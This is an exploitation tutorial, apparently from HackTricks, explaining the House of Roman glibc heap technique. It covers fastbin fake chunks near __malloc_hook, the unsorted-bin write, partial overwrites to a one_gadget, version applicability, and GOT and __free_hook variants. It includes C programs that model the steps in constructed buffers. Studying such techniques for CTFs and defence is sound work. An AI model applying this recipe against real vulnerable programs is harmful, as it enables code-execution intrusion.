House of Roman
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
This was a very interesting technique that allowed RCE without any leak, by combining fake fastbin chunks, the unsorted_bin attack and relative (partial) pointer overwrites. It has since been patched.
Applicability in 2026
- glibc window: Works reliably on 2.23–2.27 (the how2heap PoC was tested on 2.23–2.25). From 2.28 on, the "additional checks for unsorted bin integrity" patch makes the unsorted-bin write unreliable, so the success rate drops sharply. From 2.34 on __malloc_hook/__free_hook are gone, so the original target no longer exists. Use it only against old libcs (or custom builds that keep the hooks) or CTF challenges that ship an old libc.
- Tcache era (>= 2.26): tcache swallows your 0x70-sized allocations, so the fastbin/unsorted primitives are never reached. Either launch the target with tcache disabled (GLIBC_TUNABLES=glibc.malloc.tcache_count=0 in the environment before exec; tunables are parsed at process start-up, so a setenv() from inside the running process is too late) or fill the 0x70 tcache bin with 7 frees so that further frees fall through to the fastbin.
- Safe-linking (>= 2.32): tcache and fastbin fd pointers are stored as (&fd >> 12) ^ fd, so the Part 1 trick of rewriting only the low byte of fastbin_victim.fd no longer yields a predictable target unless you also know bits of the heap address. The unsorted-bin bk write (a doubly linked list, not covered by safe-linking) and the final partial overwrite of the libc pointer left in __malloc_hook are unaffected. Only 2.32 and 2.33 have safe-linking while still having the hooks; beyond that the decisive blockers are the hook removal and the unsorted-bin checks.
Code
- You can find an example at https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c
Goal
- RCE by abusing relative (partial) pointer overwrites, with no leak
Requirements
- Ability to edit fastbin and unsorted bin pointers (a UAF or an overflow into freed chunks)
- 12 bits of randomness must be brute-forced (about 1 in 4096, i.e. 0.02%, per attempt)
Attack Steps
Part 1: Fastbin chunk points to __malloc_hook
Create several chunks:
- fastbin_victim (0x60, offset 0): UAF chunk whose heap pointer will later be redirected to a libc value.
- chunk2 (0x80, offset 0x70): padding for a good alignment.
- main_arena_use (0x80, offset 0x100).
- relative_offset_heap (0x60, offset 0x190): sits at a fixed relative offset from the 'main_arena_use' chunk.
Then free(main_arena_use): this puts the chunk in the unsorted list and leaves a pointer to main_arena + 0x68 in both its fd and bk. (That label is the one the how2heap comments use; the value is really the unsorted-bin head, &main_arena.bins[0] - 0x10, which on a 2.23 x86-64 libc is main_arena + 0x58. The label does not matter for the attack, only that it is a libc pointer.)
Now a new chunk fake_libc_chunk (0x60) is allocated out of that freed chunk: it still contains the pointers to main_arena + 0x68 in fd and bk.
Then relative_offset_heap and fastbin_victim are freed, in that order, so fastbin_victim becomes the head of the 0x70 fastbin.
/*
Current heap layout:
0x0: fastbin_victim - size 0x70
0x70: alignment_filler - size 0x90
0x100: fake_libc_chunk - size 0x70 (contains a fd ptr to main_arena + 0x68)
0x170: leftover_main - size 0x20
0x190: relative_offset_heap - size 0x70
bin layout:
fastbin: fastbin_victim -> relative_offset_heap
unsorted: leftover_main
*/
- fastbin_victim's fd points to relative_offset_heap (heap + 0x190).
- relative_offset_heap is a fixed distance from fake_libc_chunk (heap + 0x100), which holds a pointer to main_arena + 0x68.
- Overwriting the last byte of fastbin_victim.fd with 0x00 turns 0x...190 into 0x...100 (the heap is page aligned, so this byte is deterministic): fastbin_victim now points to fake_libc_chunk, and the chain reads fastbin_victim -> fake_libc_chunk -> main_arena + 0x68.
For the steps above the attacker needs the ability to modify the fd pointer of fastbin_victim after it has been freed.
main_arena + 0x68 itself is not an interesting allocation target, so the pointer in fake_libc_chunk.fd is modified to point near __malloc_hook instead.
The libc pointers stored just before __malloc_hook (__memalign_hook, __realloc_hook and their neighbours) have the form 0x00007fxxxxxxxxxx, so an unaligned 8-byte read at __malloc_hook - 0x1b sees 0x7f followed by zero bytes. That 0x7f passes as the size of a fake chunk at __malloc_hook - 0x23 for the 0x70 fastbin: chunksize() masks the low 3 bits, giving 0x78, and fastbin_index(0x78) == fastbin_index(0x70). Getting there takes a 2-byte partial overwrite of fake_libc_chunk.fd: the low 12 bits of a libc address are fixed by page alignment, but the upper nibble of the second byte is random, so there are 2^4 = 16 possibilities and a 1/16 brute force here, after which the bin looks like: 0x70: fastbin_victim -> fake_libc_chunk -> (__malloc_hook - 0x23).
(For more info about the rest of the bytes check the explanation in the how2heap example.) If the guess is wrong the fastbin size check fails and the program aborts; restart until it works. These 4 bits (bits 12–15 of the libc address) are also among the 12 bits guessed in Part 3, so the total brute force stays at 12 bits.
Then 2 mallocs are done to take the first 2 fastbin chunks off the list, and a third malloc returns the fake chunk, i.e. a pointer at __malloc_hook - 0x13 that overlaps __malloc_hook:
malloc(0x60);                              // returns fastbin_victim
malloc(0x60);                              // returns fake_libc_chunk
uint8_t* malloc_hook_chunk = malloc(0x60); // returns __malloc_hook - 0x13 (the fake chunk's user pointer)
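The Part 1 chain as a constructed model, added here to illustrate the text; it is not how2heap's PoC nor code from the page. Two hand-built buffers stand in for the heap and for libc (offsets assumed from an Ubuntu 16.04 libc-2.23 build: __malloc_hook at 0x3c4b10 and the unsorted-bin head pointer at 0x3c4b78, the page's main_arena + 0x68; the 0x00007f... values placed before the hooks are constructed), and fastbin_pop re-implements only the size check glibc 2.23 performs when it pops a fastbin chunk. It applies the two partial overwrites, returns the pointer the third malloc(0x60) would hand back, and shows that a wrong 4-bit guess is refused by that same check.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model of Part 1 (added illustration, not how2heap's PoC). "heap"
   and "libc" are buffers laid out by hand; fastbin_pop() re-implements the one
   check glibc 2.23 makes when popping a fastbin chunk. Libc offsets are assumed
   from an Ubuntu 16.04 libc-2.23 build: __malloc_hook 0x3c4b10, unsorted-bin
   head pointer 0x3c4b78 (the value the page labels main_arena + 0x68). */

#define SIZE_BITS 7ull
#define FASTBIN_INDEX(sz) ((((unsigned)(sz)) >> 4) - 2)   /* 64-bit glibc macro */

enum { FASTBIN_VICTIM = 0x0, FAKE_LIBC_CHUNK = 0x100, RELATIVE_OFFSET_HEAP = 0x190 }; /* chunk headers */
enum { LIBC_SPAN = 0x400000, MALLOC_HOOK = 0x3c4b10, UNSORTED_HEAD = 0x3c4b78 };

static uint8_t *heap, *libc;
static uint8_t *malloc_hook(void) { return libc + MALLOC_HOOK; }

/* unaligned 8-byte accessors: the fake chunk inside libc is not 16-byte aligned */
static uint64_t rd64(const uint8_t *p) { uint64_t v; memcpy(&v, p, 8); return v; }
static void wr64(uint8_t *p, uint64_t v) { memcpy(p, &v, 8); }
static uint64_t chunksize(const uint8_t *c) { return rd64(c + 8) & ~SIZE_BITS; }

/* glibc 2.23: the popped chunk's size must index the bin it was taken from. */
static uint8_t *fastbin_pop(uint8_t **bin, unsigned idx) {
    uint8_t *victim = *bin;
    if (!victim || FASTBIN_INDEX(chunksize(victim)) != idx)
        return NULL;                                  /* "malloc(): memory corruption (fast)" */
    *bin = (uint8_t *)(uintptr_t)rd64(victim + 0x10); /* fd is the first user qword */
    return victim + 0x10;
}

/* Heap and libc as they look after the allocation sequence in the text. */
static void build_layout(void) {
    if (!heap) heap = aligned_alloc(0x1000, 0x1000);      /* page aligned, like a real heap */
    if (!libc) libc = aligned_alloc(0x10000, LIBC_SPAN);  /* 64 KiB aligned: low 16 bits of libc+X are X */
    memset(heap, 0, 0x1000);
    memset(libc, 0, LIBC_SPAN);
    wr64(heap + FASTBIN_VICTIM + 8, 0x71);
    wr64(heap + FAKE_LIBC_CHUNK + 8, 0x71);
    wr64(heap + RELATIVE_OFFSET_HEAP + 8, 0x71);
    /* fake_libc_chunk was carved from the freed unsorted chunk: fd/bk still hold the libc pointer */
    wr64(heap + FAKE_LIBC_CHUNK + 0x10, (uintptr_t)(libc + UNSORTED_HEAD));
    wr64(heap + FAKE_LIBC_CHUNK + 0x18, (uintptr_t)(libc + UNSORTED_HEAD));
    /* 0x00007f.. pointers sit just before the hooks (constructed values); the one at
       __malloc_hook - 0x20 supplies the 0x7f read as the size of the chunk at __malloc_hook - 0x23 */
    wr64(malloc_hook() - 0x20, 0x00007ffff7dd0260ull);
    wr64(malloc_hook() - 0x10, 0x00007ffff7a92e20ull);   /* __memalign_hook */
    wr64(malloc_hook() - 0x08, 0x00007ffff7a92a00ull);   /* __realloc_hook  */
}

/* nibble_guess is the 4-bit brute-force value (bits 12..15 of the libc address).
   Returns the third malloc(0x60) result, or NULL where glibc would abort. */
static uint8_t *house_of_roman_part1(unsigned nibble_guess) {
    build_layout();
    uint8_t *bin_0x70 = NULL;   /* free(relative_offset_heap); free(fastbin_victim); -> LIFO */
    wr64(heap + RELATIVE_OFFSET_HEAP + 0x10, (uintptr_t)bin_0x70); bin_0x70 = heap + RELATIVE_OFFSET_HEAP;
    wr64(heap + FASTBIN_VICTIM + 0x10, (uintptr_t)bin_0x70);       bin_0x70 = heap + FASTBIN_VICTIM;

    heap[FASTBIN_VICTIM + 0x10] = 0x00;   /* UAF 1: fd 0x..190 -> 0x..100, i.e. fake_libc_chunk */
    uintptr_t target = (uintptr_t)(malloc_hook() - 0x23);
    heap[FAKE_LIBC_CHUNK + 0x10] = (uint8_t)target;  /* UAF 2, byte 0: fixed by page alignment */
    heap[FAKE_LIBC_CHUNK + 0x11] = (uint8_t)(((target >> 8) & 0xf) | (nibble_guess << 4));

    unsigned idx = FASTBIN_INDEX(0x70);
    uint8_t *a = fastbin_pop(&bin_0x70, idx);  /* malloc(0x60) -> fastbin_victim   */
    uint8_t *b = fastbin_pop(&bin_0x70, idx);  /* malloc(0x60) -> fake_libc_chunk  */
    if (a != heap + FASTBIN_VICTIM + 0x10 || b != heap + FAKE_LIBC_CHUNK + 0x10) return NULL;
    return fastbin_pop(&bin_0x70, idx);        /* malloc(0x60) -> __malloc_hook - 0x13, or abort */
}

static unsigned correct_nibble(void) {
    build_layout();
    return (unsigned)(((uintptr_t)(malloc_hook() - 0x23) >> 12) & 0xf);
}

int main(void) {
    uint8_t *ok = house_of_roman_part1(correct_nibble());
    printf("right guess -> %p (__malloc_hook - 0x13 is %p)\n", (void *)ok, (void *)(malloc_hook() - 0x13));
    printf("wrong guess -> %p (glibc would abort)\n", (void *)house_of_roman_part1(correct_nibble() ^ 1));
    return 0;
}
```

Build with any C11 compiler (aligned_alloc). The nibble guess is deterministic here only because the model's libc is not randomised; in a real process it is bits 12–15 of the libc base. The rd64/wr64 helpers exist because the fake chunk at __malloc_hook - 0x23 is not 16-byte aligned, which is exactly why its size field picks up the 0x7f byte of a neighbouring pointer.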
Part 2: Unsorted_bin attack
For more information see the Unsorted Bin Attack page.
In short, when a chunk is taken out of the unsorted bin, _int_malloc writes the address of the unsorted-bin head (main_arena + 0x68 in the page's notation) to bk->fd, i.e. 0x10 past whatever address has been placed in chunk->bk. For this attack we target __malloc_hook. Afterwards a relative overwrite turns that libc pointer into a one_gadget address.
To do this, allocate a chunk and put it in the unsorted bin:
uint8_t* unsorted_bin_ptr = malloc(0x80);
malloc(0x30); // Don't want to consolidate
puts("Put chunk into unsorted_bin\n");
// Free the chunk to create the UAF
free(unsorted_bin_ptr);
Use the UAF in this chunk to point unsorted_bin_ptr->bk to __malloc_hook - 0x10 (the write lands at bk + 0x10). Because bk already holds main_arena + 0x68 (0x...b78) and __malloc_hook - 0x10 is 0x...b00 on this libc, overwriting the low byte with 0x00 is enough; the higher bytes are the ones already there, so this step needs no brute force at all.
Caution
Note that this attack corrupts the unsorted bin (and, because unsorted chunks are sorted from there, the small and large bins too): after the write, the bin head's bk points at the fake chunk inside libc. From now on only fastbin-sized allocations are safe (a more complex program that makes other allocations will crash), and the allocation that triggers the write must request exactly the size of the freed chunk so that it is returned as an exact fit instead of being sorted into a bin, or the program will die.
So, once __malloc_hook - 0x10 is in unsorted_bin_ptr->bk, triggering the write of main_arena + 0x68 into __malloc_hook only needs: malloc(0x80)
Part 3: Point __malloc_hook at a one_gadget
In Part 1 we obtained a chunk overlapping __malloc_hook (the variable malloc_hook_chunk) and in Part 2 we wrote main_arena + 0x68 into it.
Now, through malloc_hook_chunk, we partially overwrite the libc address sitting in __malloc_hook (main_arena + 0x68) so that it points to a one_gadget instead: __malloc_hook is at malloc_hook_chunk + 0x13, and since the gadget lives in the same libc mapping only the low 3 bytes need to change.
This is where the 12 random bits have to be brute-forced: of the 24 bits written, the low 12 are fixed by page alignment and the remaining 12 (bits 12–23 of the libc address) are unknown (more info in the how2heap example).
Finally, once the correct address is in place, calling malloc triggers the one_gadget.
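Parts 2 and 3 in the same kind of constructed model. This is an added example, not code from how2heap or from the page; the libc buffer uses assumed Ubuntu 16.04 libc-2.23 offsets (__malloc_hook 0x3c4b10, unsorted-bin head 0x3c4b78, one_gadget 0x45216) and nothing in it is ever executed. unsorted_take_2_23 re-implements the unsorted-bin removal step of _int_malloc that performs the bck->fd write; unsorted_take_2_28 adds the linkage check introduced in glibc 2.28 (the commit in the references) to show why the same state is now rejected; unsorted_bin_still_usable demonstrates the Caution note; part3_overwrite_hook performs the 3-byte partial overwrite.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model of Parts 2 and 3 (added illustration, not how2heap's code).
   "libc" is a buffer laid out with assumed Ubuntu 16.04 libc-2.23 offsets:
   __malloc_hook 0x3c4b10, unsorted-bin head 0x3c4b78 (the page's
   main_arena + 0x68), one_gadget 0x45216. unsorted_take_*() re-implement only
   the unsorted-bin removal step of _int_malloc(); nothing here is executed. */

typedef struct chunk { uint64_t prev_size, size; struct chunk *fd, *bk; } chunk_t;

enum { LIBC_SPAN = 0x1000000, MALLOC_HOOK = 0x3c4b10, UNSORTED_HEAD = 0x3c4b78, ONE_GADGET = 0x45216 };
#define SYSTEM_MEM 0x21000ull                   /* av->system_mem of a fresh 132 KiB main heap */

static uint8_t *libc;
static chunk_t *head(void)         { return (chunk_t *)(libc + UNSORTED_HEAD); } /* unsorted_chunks(av) */
static uint8_t **malloc_hook(void) { return (uint8_t **)(libc + MALLOC_HOOK); }
static uint8_t *one_gadget(void)   { return libc + ONE_GADGET; }

/* glibc 2.23: exact-fit removal of the last unsorted chunk. NULL stands for
   malloc_printerr("malloc(): memory corruption"). */
static chunk_t *unsorted_take_2_23(uint64_t nb) {
    chunk_t *h = head(), *victim = h->bk, *bck = victim->bk;
    uint64_t size = victim->size & ~7ull;
    if (size <= 16 || size > SYSTEM_MEM) return NULL;
    h->bk = bck;
    bck->fd = h;                 /* the attack: unsorted_chunks(av) is written to bck + 0x10 */
    return size == nb ? victim : NULL;
}

/* Same step with the linkage check glibc 2.28 added (later releases add more). */
static chunk_t *unsorted_take_2_28(uint64_t nb) {
    chunk_t *h = head(), *victim = h->bk, *bck = victim->bk;
    uint64_t size = victim->size & ~7ull;
    if (size <= 16 || size > SYSTEM_MEM) return NULL;   /* "malloc(): invalid size (unsorted)" */
    if (bck->fd != victim) return NULL;                 /* "malloc(): unsorted double linked list corrupted" */
    h->bk = bck;
    bck->fd = h;
    return size == nb ? victim : NULL;
}

/* State after free(unsorted_bin_ptr) plus the one-byte UAF write into its bk.
   libc is 16 MiB aligned so bytes 0..2 of every libc pointer are just the offset;
   in a real process a carry into byte 3 can make the Part 3 write miss as well. */
static chunk_t *setup_unsorted_attack(void) {
    if (!libc) libc = aligned_alloc(LIBC_SPAN, LIBC_SPAN);
    memset(libc, 0, LIBC_SPAN);
    chunk_t *victim = aligned_alloc(16, 0x90);          /* the freed malloc(0x80) chunk */
    memset(victim, 0, 0x90);
    victim->size = 0x91;
    victim->fd = victim->bk = head();                   /* as free() leaves it */
    head()->fd = head()->bk = victim;
    ((uint8_t *)&victim->bk)[0] = 0x00;                 /* UAF: 0x..4b78 -> 0x..4b00 = __malloc_hook - 0x10 */
    return victim;
}

/* Part 2 on 2.23: malloc(0x80) returns the chunk and __malloc_hook now holds a libc pointer. */
static int part2_on_2_23(void) {
    chunk_t *v = setup_unsorted_attack();
    return unsorted_take_2_23(0x90) == v && *malloc_hook() == (uint8_t *)head();
}

/* Part 2 on 2.28+: the same state is rejected before the write happens. */
static int part2_on_2_28(void) {
    setup_unsorted_attack();
    return unsorted_take_2_28(0x90) == NULL && *malloc_hook() == NULL;
}

/* The Caution note: after the write, the next non-fastbin request walks into the fake chunk. */
static int unsorted_bin_still_usable(void) { return unsorted_take_2_23(0x90) != NULL; }

/* Part 3: 3-byte partial overwrite of the libc pointer left in __malloc_hook.
   Byte 0 and the low nibble of byte 1 are fixed by page alignment; the other
   12 bits are the brute-forced ones (known here, since the model has no ASLR). */
static uint8_t *part3_overwrite_hook(void) {
    uint8_t *hook = (uint8_t *)malloc_hook();
    uintptr_t g = (uintptr_t)one_gadget();
    hook[0] = (uint8_t)g; hook[1] = (uint8_t)(g >> 8); hook[2] = (uint8_t)(g >> 16);
    return *malloc_hook();
}

int main(void) {
    printf("2.23: unsorted write hit __malloc_hook: %d\n", part2_on_2_23());
    printf("2.23: unsorted bin still usable afterwards: %d\n", unsorted_bin_still_usable());
    printf("2.23: __malloc_hook == one_gadget after partial overwrite: %d\n", part3_overwrite_hook() == one_gadget());
    printf("2.28: unsorted write refused: %d\n", part2_on_2_28());
    return 0;
}
```

The 2.28 variant fails on bck->fd != victim because the fake "chunk" at __malloc_hook - 0x10 has __malloc_hook itself where fd should be, and it is still zero; that is the check the Applicability section refers to, and it is why the write would need a target whose fd slot already holds the victim's address.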
Modern notes & variants
- Unsorted-bin hardening (2.28+): extra integrity checks on unsorted chunks (size sanity plus list linkage, in particular bck->fd must point back at the victim) make the classic unsorted-bin write fragile. To survive _int_malloc you must keep the fd/bk links consistent and the sizes plausible, which usually needs stronger primitives than a single partial overwrite.
- Hook removal (2.34+): with __malloc_hook gone, retarget the primitive at a GOT entry or any writable global you can trigger later (e.g. overwrite exit@GOT in a non-PIE binary), or pivot to a House of Pie style top-chunk hijack and control top instead of a hook.
- Any-address fastbin alloc (romanking98 writeup): the second part shows how to repair the 0x71 freelist and use the unsorted-bin write to land a fastbin allocation on top of __free_hook, then write system there and trigger it with free() on a chunk holding "/bin/sh", on libc-2.24 (before hook removal).
References
- https://github.com/shellphish/how2heap
- https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c
- https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_roman/
- https://halloween.synacktiv.com/publications/heap-tricks-never-get-old-insomnihack-teaser-2022.html
- https://gist.github.com/romanking98/9aab2804832c0fb46615f025e8ffb0bc
- https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=NEWS;hb=glibc-2.34
- https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=b90ddd08f6dd688e651df9ee89ca3a69ff88cd0c